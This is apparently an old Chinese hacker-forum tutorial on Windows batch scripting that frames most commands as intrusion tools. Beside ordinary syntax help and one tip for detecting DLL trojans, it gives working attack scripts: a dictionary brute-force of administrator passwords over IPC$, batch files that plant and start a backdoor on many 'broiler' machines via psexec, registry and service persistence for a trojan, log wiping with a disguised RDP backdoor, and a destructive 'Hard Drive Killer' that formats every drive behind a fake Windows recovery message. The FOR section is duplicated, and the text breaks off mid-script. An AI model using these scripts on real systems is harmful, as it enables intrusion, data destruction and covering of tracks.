簡單bat語法
一.簡單批處理內部命令簡介html
1.Echo 命令mysql
打開回顯或關閉請求回顯功能,或顯示消息。若是沒有任何參數,echo 命令將顯示當前回顯設置。ios
語法程序員
echo [{on off}] [message]web
Sample:@echo off / echo hello world算法
在實際應用中咱們會把這條命令和重定向符號(也稱爲管道符號,通常用> >> ^)結合來實現輸入一些命令到特定格式的文件中.這將在之後的例子中體現出來。sql
2.@ 命令shell
表示不顯示@後面的命令,在入侵過程當中(例如使用批處理來格式化敵人的硬盤)天然不能讓對方看到你使用的命令啦。編程
Sample:@echo offc#
@echo Now initializing the program,please wait a minite...
@format X: /q/u/autoset (format 這個命令是不可使用/y這個參數的,可喜的是微軟留了個autoset這個參數給咱們,效果和/y是同樣的。)
3.Goto 命令
指定跳轉到標籤,找到標籤後,程序將處理從下一行開始的命令。
語法:goto label (label是參數,指定所要轉向的批處理程序中的行。)
Sample:
if {%1}=={} goto noparms
if {%2}=={} goto noparms(若是這裏的if、%一、%2你不明白的話,先跳過去,後面會有詳細的解釋。)
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end
標籤的名字能夠隨便起,可是最好是有意義的字母啦,字母前加個:用來表示這個字母是標籤,goto命令就是根據這個:來尋找下一步跳到到那裏。最好有一些說明這樣你別人看起來纔會理解你的意圖啊。
4.Rem 命令
註釋命令,在C語言中至關與/*--------*/,它並不會被執行,只是起一個註釋的做用,便於別人閱讀和你本身往後修改。
Rem Message
Sample:@Rem Here is the description.
5.Pause 命令
運行 Pause 命令時,將顯示下面的消息:
Press any key to continue . . .
Sample:
@echo off
:begin
copy a:*.* d:\back
echo Please put a new disk into driver A
pause
goto begin
在這個例子中,驅動器 A 中磁盤上的全部文件均複製到d:\back中。顯示的註釋提示您將另外一張磁盤放入驅動器 A 時,pause 命令會使程序掛起,以便您更換磁盤,而後按任意鍵繼續處理。
6.Call 命令
從一個批處理程序調用另外一個批處理程序,而且不終止父批處理程序。call 命令接受用做調用目標的標籤。若是在腳本或批處理文件外使用 Call,它將不會在命令行起做用。
語法
call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
參數
[Drive:}[Path] FileName
指定要調用的批處理程序的位置和名稱。filename 參數必須具備 .bat 或 .cmd 擴展名。
7.start 命令
調用外部程序,全部的DOS命令和命令行程序均可以由start命令來調用。
入侵經常使用參數:
MIN 開始時窗口最小化
SEPARATE 在分開的空間內開始 16 位 Windows 程序
HIGH 在 HIGH 優先級類別開始應用程序
REALTIME 在 REALTIME 優先級類別開始應用程序
WAIT 啓動應用程序並等候它結束
parameters 這些爲傳送到命令/程序的參數
執行的應用程序是 32-位 GUI 應用程序時,CMD.EXE 不等應用程序終止就返回命令提示。若是在命令腳本內執行,該新行爲則不會發生。
8.choice 命令
choice 使用此命令可讓用戶輸入一個字符,從而運行不一樣的命令。使用時應該加/c:參數,c:後應寫提示可輸入的字符,之間無空格。它的返回碼爲1234……
如: choice /c:dme defrag,mem,end
將顯示
defrag,mem,end[D,M,E]?
Sample:
Sample.bat的內容以下:
@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag (應先判斷數值最高的錯誤碼)
if errorlevel 2 goto mem
if errotlevel 1 goto end
:defrag
c:\dos\defrag
goto end
:mem
mem
goto end
:end
echo good bye
此文件運行後,將顯示 defrag,mem,end[D,M,E]? 用戶可選擇d m e ,而後if語句將做出判斷,d表示執行標號爲defrag的程序段,m表示執行標號爲mem的程序段,e表示執行標號爲end的程序段,每一個程序段最後都以goto end將程序跳到end標號處,而後程序將顯示good bye,文件結束。
9.If 命令
if 表示將判斷是否符合規定的條件,從而決定執行不一樣的命令。 有三種格式:
一、if "參數" == "字符串" 待執行的命令
參數若是等於指定的字符串,則條件成立,運行命令,不然運行下一句。(注意是兩個等號)
如if "%1"=="a" format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms
二、if exist 文件名 待執行的命令
若是有指定的文件,則條件成立,運行命令,不然運行下一句。
如if exist config.sys edit config.sys
三、if errorlevel / if not errorlevel 數字 待執行的命令
若是返回碼等於指定的數字,則條件成立,運行命令,不然運行下一句。
如if errorlevel 2 goto x2
DOS程序運行時都會返回一個數字給DOS,稱爲錯誤碼errorlevel或稱返回碼,常見的返回碼爲0、1。
10.for 命令
for 命令是一個比較複雜的命令,主要用於參數在指定的範圍內循環執行命令。
在批處理文件中使用 FOR 命令時,指定變量請使用 %%variable
for {%variable %%variable} in (set) do command [ CommandLineOptions]
%variable 指定一個單一字母可替換的參數。
(set) 指定一個或一組文件。可使用通配符。
command 指定對每一個文件執行的命令。
command-parameters 爲特定命令指定參數或命令行開關。
在批處理文件中使用 FOR 命令時,指定變量請使用 %%variable
而不要用 %variable。變量名稱是區分大小寫的,因此 %i 不一樣於 %I
若是命令擴展名被啓用,下列額外的 FOR 命令格式會受到
支持:
FOR /D %variable IN (set) DO command [command-parameters]
若是集中包含通配符,則指定與目錄名匹配,而不與文件名匹配。
FOR /R [[drive:]path] %variable IN (set) DO command [command-
檢查以 [drive:]path 爲根的目錄樹,指向每一個目錄中的FOR 語句。若是在 /R 後沒有指定目錄,則使用當前目錄。若是集僅爲一個單點(.)字符,則枚舉該目錄樹。
FOR /L %variable IN (start,step,end) DO command [command-para
該集表示以增量形式從開始到結束的一個數字序列。
所以,(1,1,5) 將產生序列 1 2 3 4 5,(5,-1,1) 將產生
序列 (5 4 3 2 1)。
FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN (command) DO command
或者,若是有 usebackq 選項:
FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN (command) DO command
filenameset 爲一個或多個文件名。繼續到 filenameset 中的
下一個文件以前,每份文件都已被打開、讀取並通過處理。
處理包括讀取文件,將其分紅一行行的文字,而後將每行
解析成零或更多的符號。而後用已找到的符號字符串變量值
調用 For 循環。以默認方式,/F 經過每一個文件的每一行中分開
的第一個空白符號。跳過空白行。您可經過指定可選 "options"
參數替代默認解析操做。這個帶引號的字符串包括一個或多個
指定不一樣解析選項的關鍵字。這些關鍵字爲:
eol=c - 指一個行註釋字符的結尾(就一個)
skip=n - 指在文件開始時忽略的行數。
delims=xxx - 指分隔符集。這個替換了空格和跳格鍵的
默認分隔符集。
tokens=x,y,m-n - 指每行的哪個符號被傳遞到每一個迭代
的 for 自己。這會致使額外變量名稱的
格式爲一個範圍。經過 nth 符號指定 m
符號字符串中的最後一個字符星號,
那麼額外的變量將在最後一個符號解析之
分配並接受行的保留文本。
usebackq - 指定新語法已在下類狀況中使用:
在做爲命令執行一個後引號的字符串而且引號字符爲文字字符串命令並容許在 fi中使用雙引號擴起文件名稱。
10.for 命令
for 命令是一個比較複雜的命令,主要用於參數在指定的範圍內循環執行命令。
在批處理文件中使用 FOR 命令時,指定變量請使用 %%variable
for {%variable %%variable} in (set) do command [ CommandLineOptions]
%variable 指定一個單一字母可替換的參數。
(set) 指定一個或一組文件。可使用通配符。
command 指定對每一個文件執行的命令。
command-parameters 爲特定命令指定參數或命令行開關。
在批處理文件中使用 FOR 命令時,指定變量請使用 %%variable
而不要用 %variable。變量名稱是區分大小寫的,因此 %i 不一樣於 %I
若是命令擴展名被啓用,下列額外的 FOR 命令格式會受到
支持:
FOR /D %variable IN (set) DO command [command-parameters]
若是集中包含通配符,則指定與目錄名匹配,而不與文件名匹配。
FOR /R [[drive:]path] %variable IN (set) DO command [command-
檢查以 [drive:]path 爲根的目錄樹,指向每一個目錄中的FOR 語句。若是在 /R 後沒有指定目錄,則使用當前目錄。若是集僅爲一個單點(.)字符,則枚舉該目錄樹。
FOR /L %variable IN (start,step,end) DO command [command-para
該集表示以增量形式從開始到結束的一個數字序列。
所以,(1,1,5) 將產生序列 1 2 3 4 5,(5,-1,1) 將產生
序列 (5 4 3 2 1)。
FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN (command) DO command
或者,若是有 usebackq 選項:
FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN (command) DO command
filenameset 爲一個或多個文件名。繼續到 filenameset 中的
下一個文件以前,每份文件都已被打開、讀取並通過處理。
處理包括讀取文件,將其分紅一行行的文字,而後將每行
解析成零或更多的符號。而後用已找到的符號字符串變量值
調用 For 循環。以默認方式,/F 經過每一個文件的每一行中分開
的第一個空白符號。跳過空白行。您可經過指定可選 "options"
參數替代默認解析操做。這個帶引號的字符串包括一個或多個
指定不一樣解析選項的關鍵字。這些關鍵字爲:
eol=c - 指一個行註釋字符的結尾(就一個)
skip=n - 指在文件開始時忽略的行數。
delims=xxx - 指分隔符集。這個替換了空格和跳格鍵的
默認分隔符集。
tokens=x,y,m-n - 指每行的哪個符號被傳遞到每一個迭代
的 for 自己。這會致使額外變量名稱的
格式爲一個範圍。經過 nth 符號指定 m
符號字符串中的最後一個字符星號,
那麼額外的變量將在最後一個符號解析之
分配並接受行的保留文本。
usebackq - 指定新語法已在下類狀況中使用:
在做爲命令執行一個後引號的字符串而且引號字符爲文字字符串命令並容許在 fi中使用雙引號擴起文件名稱。
sample1:
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command
會分析 myfile.txt 中的每一行,忽略以分號打頭的那些行,將每行中的第二個和第三個符號傳遞給 for 程序體;用逗號和/或空格定界符號。請注意,這個 for 程序體的語句引用 %i 來取得第二個符號,引用 %j 來取得第三個符號,引用 %k來取得第三個符號後的全部剩餘符號。對於帶有空格的文件名,您須要用雙引號將文件名括起來。爲了用這種方式來使用雙引號,您還須要使用 usebackq 選項,不然,雙引號會被理解成是用做定義某個要分析的字符串的。
%i 專門在 for 語句中獲得說明,%j 和 %k 是經過
tokens= 選項專門獲得說明的。您能夠經過 tokens= 一行指定最多 26 個符號,只要不試圖說明一個高於字母 z 或Z 的變量。請記住,FOR 變量是單一字母、分大小寫和全局的同時不能有 52 個以上都在使用中。
您還能夠在相鄰字符串上使用 FOR /F 分析邏輯;方法是,用單引號將括號之間的 filenameset 括起來。這樣,該字符串會被看成一個文件中的一個單一輸入行。
最後,您能夠用 FOR /F 命令來分析命令的輸出。方法是,將括號之間的 filenameset 變成一個反括字符串。該字符串會被看成命令行,傳遞到一個子 CMD.EXE,其輸出會被抓進內存,並被看成文件分析。所以,如下例子:
FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i
會枚舉當前環境中的環境變量名稱。
另外,FOR 變量參照的替換已被加強。您如今可使用下列
選項語法:
~I - 刪除任何引號("),擴充 %I
%~fI - 將 %I 擴充到一個徹底合格的路徑名
%~dI - 僅將 %I 擴充到一個驅動器號
%~pI - 僅將 %I 擴充到一個路徑
%~nI - 僅將 %I 擴充到一個文件名
%~xI - 僅將 %I 擴充到一個文件擴展名
%~sI - 擴充的路徑只含有短名
%~aI - 將 %I 擴充到文件的文件屬性
%~tI - 將 %I 擴充到文件的日期/時間
%~zI - 將 %I 擴充到文件的大小
%~$PATH:I - 查找列在路徑環境變量的目錄,並將 %I 擴充到找到的第一個徹底合格的名稱。若是環境變量未被定義,或者沒有找到文件,此組合鍵會擴充空字符串
能夠組合修飾符來獲得多重結果:
%~dpI - 僅將 %I 擴充到一個驅動器號和路徑
%~nxI - 僅將 %I 擴充到一個文件名和擴展名
%~fsI - 僅將 %I 擴充到一個帶有短名的完整路徑名
%~dp$PATH:i - 查找列在路徑環境變量的目錄,並將 %I 擴充到找到的第一個驅動器號和路徑。
%~ftzaI - 將 %I 擴充到相似輸出線路的 DIR
在以上例子中,%I 和 PATH 可用其餘有效數值代替。%~ 語法
用一個有效的 FOR 變量名終止。選取相似 %I 的大寫變量名比較易讀,並且避免與不分大小寫的組合鍵混淆。
以上是MS的官方幫助,下面咱們舉幾個例子來具體說明一下For命令在入侵中的用途。
sample2:
利用For命令來實現對一臺目標Win2k主機的暴力密碼破解。
咱們用net use file://ip/ipc$ "password" /u:"administrator"來嘗試這和目標主機進行鏈接,當成功時記下密碼。
最主要的命令是一條:for /f i% in (dict.txt) do net use file://ip/ipc$ "i%" /u:"administrator"
用i%來表示admin的密碼,在dict.txt中這個取i%的值用net use 命令來鏈接。而後將程序運行結果傳遞給find命令--
for /f i%% in (dict.txt) do net use file://ip/ipc$ "i%%" /u:"administrator" find ":命令成功完成">>D:\ok.txt ,這樣就ko了。
sample3:
你有沒有過手裏有大量肉雞等着你去種後門+木馬呢?,當數量特別多的時候,本來很開心的一件事都會變得很鬱悶:)。文章開頭就談到使用批處理文件,能夠簡化平常或重複性任務。那麼如何實現呢?呵呵,看下去你就會明白了。
主要命令也只有一條:(在批處理文件中使用 FOR 命令時,指定變量使用 %%variable)
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
tokens的用法請參見上面的sample1,在這裏它表示按順序將victim.txt中的內容傳遞給door.bat中的參數%i %j %k。
而cultivate.bat無非就是用net use命令來創建IPC$鏈接,並copy木馬+後門到victim,而後用返回碼(If errorlever =)來篩選成功種植後門的主機,並echo出來,或者echo到指定的文件。
delims= 表示vivtim.txt中的內容是一空格來分隔的。我想看到這裏你也必定明白這victim.txt裏的內容是什麼樣的了。應該根據%%i %%j %%k表示的對象來排列,通常就是 ip password username。
代碼雛形:
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
------------------- cut here then save as a batchfile(I call it door.bat) -----------------------------
@net use file://%1/ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection …………OK
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt
@psexec file://%1/ c:\winnt\system32\windrv32.exe
@psexec file://%1/ net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat) --------------------------------
這只是一個自動種植後門批處理的雛形,兩個批處理和後門程序(Windrv32.exe),PSexec.exe需放在統一目錄下.批處理內容
尚可擴展,例如:加入清除日誌+DDOS的功能,加入定時添加用戶的功能,更深刻一點可使之具有自動傳播功能(蠕蟲).此處很少作敘述,有興趣的朋友可自行研究.
二.如何在批處理文件中使用參數
批處理中可使用參數,通常從1%到 9%這九個,當有多個參數時須要用shift來移動,這種狀況並很少見,咱們就不考慮它了。
sample1:fomat.bat
@echo off
if "%1"=="a" format a:
:format
@format a:/q/u/auotset
@echo please insert another disk to driver A.
@pause
@goto fomat
這個例子用於連續地格式化幾張軟盤,因此用的時候需在dos窗口輸入fomat.bat a,呵呵,好像有點多此一舉了~^_^
sample2:
當咱們要創建一個IPC$鏈接地時候總要輸入一大串命令,弄很差就打錯了,因此咱們不如把一些固定命令寫入一個批處理,把肉雞地ip password username 當着參數來賦給這個批處理,這樣就不用每次都打命令了。
@echo off
@net use file://1%/ipc$ "2%" /u:"3%" 注意哦,這裏PASSWORD是第二個參數。
@if errorlevel 1 echo connection failed
怎麼樣,使用參數仍是比較簡單的吧?你這麼帥必定學會了^_^.No.3
三.如何使用組合命令(Compound Command)
1.&
Usage:第一條命令 & 第二條命令 [& 第三條命令...]
用這種方法能夠同時執行多條命令,而無論命令是否執行成功
Sample:
C:\>dir z: & dir c:\Ex4rch
The system cannot find the path specified.
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:\Ex4rch
2002-05-14 23:51
.
2002-05-14 23:51
..
2002-05-14 23:51 14 sometips.gif
3.
Usage:第一條命令 第二條命令 [ 第三條命令...]
用這種方法能夠同時執行多條命令,當碰到執行正確的命令後將不執行後面的命令,若是沒有出現正確的命令則一直執行完全部命令;
Sample:
C:\Ex4rch>dir sometips.gif del sometips.gif
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of C:\Ex4rch
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
0 Dir(s) 768,696,320 bytes free
組合命令使用的例子:
sample:
@copy trojan.exe file://%1/admin$/system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3 >>victim.txt
4、管道命令的使用
1. 命令
Usage:第一條命令 第二條命令 [ 第三條命令...]
將第一條命令的結果做爲第二條命令的參數來使用,記得在unix中這種方式很常見。
sample:
time /t>>D:\IP.log
netstat -n -p tcp find ":3389">>D:\IP.log
start Explorer
看出來了麼?用於終端服務容許咱們爲用戶自定義起始的程序,來實現讓用戶運行下面這個bat,以得到登陸用戶的IP。
2.>、>>輸出重定向命令
將一條命令或某個程序輸出結果的重定向到特定文件中, > 與 >>的區別在於,>會清除調原有文件中的內容後寫入指定文件,而>>只會追加內容到指定文件中,而不會改動其中的內容。
sample1:
echo hello world>c:\hello.txt (stupid example?)
sample2:
時下DLL木馬盛行,咱們知道system32是個捉迷藏的好地方,許多木馬都削尖了腦殼往那裏鑽,DLL馬也不例外,針對這一點咱們能夠在安裝好系統和必要的應用程序後,對該目錄下的EXE和DLL文件做一個記錄:
運行CMD--轉換目錄到system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt,
這樣全部的EXE和DLL文件的名稱都被分別記錄到exeback.txt和dllback.txt中,
往後如發現異常但用傳統的方法查不出問題時,則要考慮是否是系統中已經潛入DLL木馬了.
這時咱們用一樣的命令將system32下的EXE和DLL文件記錄到另外的exeback1.txt和dllback1.txt中,而後運行:
CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>diff.txt.(用FC命令比較先後兩次的DLL和EXE文件,並將結果輸入到diff.txt中),這樣咱們就能發現一些多出來的DLL和EXE文件,而後經過查看建立時間、版本、是否通過壓縮等就可以比較容易地判斷出是否是已經被DLL木馬光顧了。沒有是最好,若是有的話也不要直接DEL掉,先用regsvr32 /u trojan.dll將後門DLL文件註銷掉,再把它移到回收站裏,若系統沒有異常反映再將之完全刪除或者提交給殺毒軟件公司。
3.< 、>& 、<&
< 從文件中而不是從鍵盤中讀入命令輸入。
>& 將一個句柄的輸出寫入到另外一個句柄的輸入中。
<& 從一個句柄讀取輸入並將其寫入到另外一個句柄輸出中。
這些並不經常使用,也就很少作介紹。
No.5
五.如何用批處理文件來操做註冊表
在入侵過程當中常常回操做註冊表的特定的鍵值來實現必定的目的,例如:爲了達到隱藏後門、木馬程序而刪除Run下殘餘的鍵值。或者建立一個服務用以加載後門。固然咱們也會修改註冊表來加固系統或者改變系統的某個屬性,這些都須要咱們對註冊表操做有必定的瞭解。下面咱們就先學習一下如何使用.REG文件來操做註冊表.(咱們能夠用批處理來生成一個REG文件)
關於註冊表的操做,常見的是建立、修改、刪除。
1.建立
建立分爲兩種,一種是建立子項(Subkey)
咱們建立一個文件,內容以下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]
而後執行該腳本,你就已經在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下建立了一個名字爲「hacker」的子項。
另外一種是建立一個項目名稱
那這種文件格式就是典型的文件格式,和你從註冊表中導出的文件格式一致,內容以下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"Invader"="Ex4rch"
"Door"=C:\\WINNT\\system32\\door.exe
"Autodos"=dword:02
這樣就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下
新建了:Invader、door、about這三個項目
Invader的類型是「String Value」
door的類型是「REG SZ Value」
Autodos的類型是「DWORD Value」
2.修改
修改相對來講比較簡單,只要把你須要修改的項目導出,而後用記事本進行修改,而後導入(regedit /s)便可。
3.刪除
咱們首先來講說刪除一個項目名稱,咱們建立一個以下的文件:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Ex4rch"=-
執行該腳本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的"Ex4rch"就被刪除了;
咱們再看看刪除一個子項,咱們建立一個以下的腳本:
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
執行該腳本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已經被刪除了。
相信看到這裏,.reg文件你基本已經掌握了。那麼如今的目標就是用批處理來建立特定內容的.reg文件了,記得咱們前面說道的利用重定向符號能夠很容易地建立特定類型的文件。
samlpe1:如上面的那個例子,如想生成以下注冊表文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128
只須要這樣:
@echo Windows Registry Editor Version 5.00>>Sample.reg
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>Sample.reg
@echo "Invader"="Ex4rch">>Sample.reg
@echo "door"=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg
@echo "Autodos"=dword:02>>Sample.reg
samlpe2:
咱們如今在使用一些比較老的木馬時,可能會在註冊表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(Runonce、Runservices、Runexec)]下生成一個鍵值用來實現木馬的自啓動.可是這樣很容易暴露木馬程序的路徑,從而致使木馬被查殺,相對地如果將木馬程序註冊爲系統服務則相對安全一些.下面以配置好地IRC木馬DSNX爲例(名爲windrv32.exe)
@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe
@regedit /s patch.dll
@delete patch.dll
@REM [刪除DSNXDE在註冊表中的啓動項,用sc.exe將之註冊爲系統關鍵性服務的同時將其屬性設爲隱藏和只讀,並config爲自啓動]
@REM 這樣不是更安全^_^.
六.精彩實例放送。
1.刪除win2k/xp系統默認共享的批處理
------------------------ cut here then save as .bat or .cmd file ---------------------------
@echo preparing to delete all the default shares.when ready pres any key.
@pause
@echo off
:Rem check parameters if null show usage.
if {%1}=={} goto :Usage
:Rem code start.
echo.
echo ------------------------------------------------------
echo.
echo Now deleting all the default shares.
echo.
net share %1$ /delete
net share %2$ /delete
net share %3$ /delete
net share %4$ /delete
net share %5$ /delete
net share %6$ /delete
net share %7$ /delete
net share %8$ /delete
net share %9$ /delete
net stop Server
net start Server
echo.
echo All the shares have been deleteed
echo.
echo ------------------------------------------------------
echo.
echo Now modify the registry to change the system default properties.
echo.
echo Now creating the registry file
echo Windows Registry Editor Version 5.00> c:\delshare.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>> c:\delshare.reg
echo "AutoShareWks"=dword:00000000>> c:\delshare.reg
echo "AutoShareServer"=dword:00000000>> c:\delshare.reg
echo Nowing using the registry file to chang the system default properties.
regedit /s c:\delshare.reg
echo Deleting the temprotarily files.
del c:\delshare.reg
goto :END
:Usage
echo.
echo ------------------------------------------------------
echo.
echo ☆ A example for batch file ☆
echo ☆ [Use batch file to change the sysytem share properties.] ☆
echo.
echo Author:Ex4rch
echo Mail:Ex4rch@hotmail.com QQ:1672602
echo.
echo Error:Not enough parameters
echo.
echo ☆ Please enter the share disk you wanna delete ☆
echo.
echo For instance,to delete the default shares:
echo delshare c d e ipc admin print
echo.
echo If the disklable is not as C: D: E: ,Please chang it youself.
echo.
echo example:
echo If locak disklable are C: D: E: X: Y: Z: ,you should chang the command into :
echo delshare c d e x y z ipc admin print
echo.
echo *** you can delete nine shares once in a useing ***
echo.
echo ------------------------------------------------------
goto :EOF
:END
echo.
echo ------------------------------------------------------
echo.
echo OK,delshare.bat has deleted all the share you assigned.
echo.Any questions ,feel free to mail to Ex4rch@hotmail.com.
echo
echo.
echo ------------------------------------------------------
echo.
:EOF
echo end of the batch file
------------------------ cut here then save as .bat or .cmd file ---------------------------
------------------------ cut here then save as .bat or .cmd file ---------------------------
下面命令是清除肉雞全部日誌,禁止一些危險的服務,並修改肉雞的terminnal service留跳後路。
@regedit /s patch.dll
@net stop w3svc
@net stop event log
@del c:\winnt\system32\logfiles\w3svc1\*.* /f /q
@del c:\winnt\system32\logfiles\w3svc2\*.* /f /q
@del c:\winnt\system32\config\*.event /f /q
@del c:\winnt\system32dtclog\*.* /f /q
@del c:\winnt\*.txt /f /q
@del c:\winnt\*.log /f /q
@net start w3svc
@net start event log
@rem [刪除日誌]
@net stop lanmanserver /y
@net stop Schedule /y
@net stop RemoteRegistry /y
@del patch.dll
@echo The server has been patched,Have fun.
@del patch.bat
@REM [禁止一些危險的服務。]
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>patch.dll
@echo "PortNumber"=dword:00002010 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp >>patch.dll
@echo "PortNumber"=dword:00002012 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService] >>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo "ErrorControl"=dword:00000001 >>patch.dll
@echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\ >>patch.dll
@echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\ >>patch.dll
@echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll
@echo "ObjectName"="LocalSystem" >>patch.dll
@echo "Type"=dword:00000010 >>patch.dll
@echo "Description"="Keep record of the program and windows message。" >>patch.dll
@echo "DisplayName"="Microsoft EventLog" >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@copy c:\winnt\system32\termsrv.exe c:\winnt\system32\eventlog.exe
@REM [修改3389鏈接,端口爲8210(十六進制爲00002012),名稱爲Microsoft EventLog,留條後路]
3.Hard Drive Killer Pro Version 4.0(玩批處理到這個水平真的不容易了。)
------------------------ cut here then save as .bat or .cmd file ---------------------------
@echo off
rem This program is dedecated to a very special person that does not want to be named.
:start
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo call format c: /q /u /autoSample >nul >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat >nul
rem Drive checking and assigning the valid drives to the drive variable.
set drive=
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
rem code insertion for Drive Checking takes place here.
rem drivechk.bat is the file name under the root directory.
rem As far as the drive detection and drive variable settings, dont worry about how it
rem works, its d\*amn to complicated for the average or even the expert batch programmer.
rem Except for Tom Lavedas.
echo @echo off >drivechk.bat
echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
rem When errorlevel is 1, then the above is not true, if 0, then its true.
rem Opposite of binary rules. If 0, it will elaps to the next command.
echo @prompt %%%%comspec%%%% /f /c dir %%%%1:.\/ad/w/-p $b find "bytes" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
rem if errorlevel is 1, then the drive specified is a removable media drive - not ready.
rem if errorlevel is 0, then it will elaps to the next command.
echo @prompt dir %%%%1:.\/ad/w/-p $b find " 0 bytes free" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
rem if its errorlevel 1, then the specified drive is a hard or floppy drive.
rem if its not errorlevel 1, then the specified drive is a CD-ROM drive.
echo :enddc >>drivechk.bat
rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING".
rem Now we will use the program drivechk.bat to attain valid drive information.
:Sampledrv
for %%a in (%alldrive%) do call drivechk.bat %%a >nul
del drivechk.bat >nul
if %drive.==. set drive=c
:form_del
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
